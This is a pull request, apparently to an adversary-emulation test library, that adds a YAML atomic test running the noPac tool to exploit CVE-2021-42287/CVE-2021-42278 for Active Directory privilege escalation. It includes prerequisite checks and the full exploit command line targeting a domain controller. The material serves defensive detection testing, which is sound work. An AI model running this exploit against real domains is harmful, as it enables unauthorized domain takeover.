### PR TITLE
[T1068] Add noPac attack for EOP on AD domain

### DIFF
--- a/atomics/T1068/T1068.yaml
+++ b/atomics/T1068/T1068.yaml
@@ -1,0 +1,61 @@
+attack_technique: T1068
+display_name: 'Exploitation for Privilege Escalation'
+atomic_tests:
+- name: noPac
+  auto_generated_guid: 233d0587-b3d0-416c-84b1-c0b38bce0d01
+  description: |
+    This module runs the Windows executable of noPac in order to exploit CVE-2021-42287/CVE-2021-42278 to elevate privileges on the AD domain.
+  supported_platforms:
+  - windows
+  input_arguments:
+    nopac_path:
+      description: noPac Windows executable
+      type: path
+      default: '$env:TEMP\noPac.exe'
+    target_dc:
+      description: Domain Controller to target for exploitation
+      type: string
+      default: DC.NOPAC.CORP
+    computer_account:
+      description: Computer account to create (initial name)
+      type: string
+      default: 'noPacWorkstation'
+    computer_password:
+      description: Computer account to create (password)
+      type: string
+      default: 'P@ssw0rd'
+    service:
+      description: DC service to target
+      type: string
+      default: 'cifs'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      noPac binary must exist on disk and at specified location (#{nopac_path}). This binary has to be compiled beforehand.
+      And the computer must be domain joined (implicit authentication).
+    prereq_command: |
+      if (Test-Path "#{nopac_path}") {
+        Write-Host "OK: noPac executable was found"
+      } else {
+        Write-Host "NOK: noPac executable was not found"
+        exit 1
+      }
+
+      if ((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {
+        Write-Host "OK: the computer is joined to the domain"
+      } else {
+        Write-Host "NOK: the computer is not joined to the domain"
+        exit 1
+      }
+
+      # If everything goes well
+      exit 0
+    get_prereq_command: |
+      Write-Host "1. This computer must be manually added to the targeted domain"
+      Write-Host "2. The binary for noPac must be compiled from the source (the executable is not provided on GitHub)"
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      klist purge
+      & "#{nopac_path}" /dc "#{target_dc}" /mAccount "#{computer_account}" /mPassword "#{computer_password}" /service "#{service}" /ptt

--- a/atomics/T1068/T1068.yaml
+++ b/atomics/T1068/T1068.yaml
@@ -1,10 +1,10 @@
 attack_technique: T1068
 display_name: 'Exploitation for Privilege Escalation'
 atomic_tests:
-- name: noPac
+- name: SAM Name impersonation (noPac tool)
   auto_generated_guid: 233d0587-b3d0-416c-84b1-c0b38bce0d01
   description: |
-    This module runs the Windows executable of noPac in order to exploit CVE-2021-42287/CVE-2021-42278 to elevate privileges on the AD domain.
+    This module runs the Windows executable of noPac (https://github.com/cube0x0/noPac) in order to exploit CVE-2021-42287/CVE-2021-42278 to elevate privileges on the AD domain.
   supported_platforms:
   - windows
   input_arguments:
@@ -51,11 +51,11 @@ atomic_tests:
       # If everything goes well
       exit 0
     get_prereq_command: |
-      Write-Host "1. This computer must be manually added to the targeted domain"
-      Write-Host "2. The binary for noPac must be compiled from the source (the executable is not provided on GitHub)"
+      Write-Host "1. This computer must be manually joined to the targeted domain"
+      Write-Host "2. The binary for noPac must be compiled from the source (the executable is not provided on GitHub: https://github.com/cube0x0/noPac)"
   executor:
-    name: powershell
+    name: command_prompt
     elevation_required: false
     command: |
       klist purge
-      & "#{nopac_path}" /dc "#{target_dc}" /mAccount "#{computer_account}" /mPassword "#{computer_password}" /service "#{service}" /ptt
+      "#{nopac_path}" /dc "#{target_dc}" /mAccount "#{computer_account}" /mPassword "#{computer_password}" /service "#{service}" /ptt


### PR DESCRIPTION
**Details:**
Add the exploitation of Windows CVE-2021-42287 / CVE-2021-42278, through the use of the noPac attack tool (https://github.com/cube0x0/noPac).

**Testing:**
Local testing.
![image](https://user-images.githubusercontent.com/42844128/150811475-e5affd65-5ceb-49d2-975e-a0c7d50e411c.png)

**Associated Issues:**
N.A.